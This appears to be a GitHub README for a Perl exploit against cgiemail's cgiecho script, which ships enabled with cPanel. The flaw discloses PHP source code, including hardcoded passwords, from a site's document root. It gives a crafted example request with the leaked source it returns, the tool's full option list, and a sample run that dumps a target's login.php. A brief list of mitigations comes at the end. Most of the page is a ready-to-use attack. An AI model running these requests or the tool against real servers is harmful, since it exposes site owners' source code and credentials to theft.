Skip to content

Latest commit

 

History

History
64 lines (57 loc) · 2.3 KB

README.md

File metadata and controls

64 lines (57 loc) · 2.3 KB

Cgiemail - Source Code Disclosure/Local File Inclusion Exploit

cgiecho a script included with cgiemail will return any file under a websites document root if the file contains square brackets and the text within the brackets is guessable.

cgiemail is currently shipped with cPanel, enabled by default.

screen-shot

Example

For page:

<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

Requesting:

http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

Returns:

<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in commer separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

example

$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

caveats

  • if no value is supplied for a variable it will be excluded so expect to see some '$_POST/$_GET' variables with missing []...

Solutions

  • don't use cgiemail...
  • disable cgiemail...
  • if for whatever reason your stuck on a system with cgiemail the maximum variable length is 255; a long string inside square brackets will return an error.
  • don't use square brackets?

Reference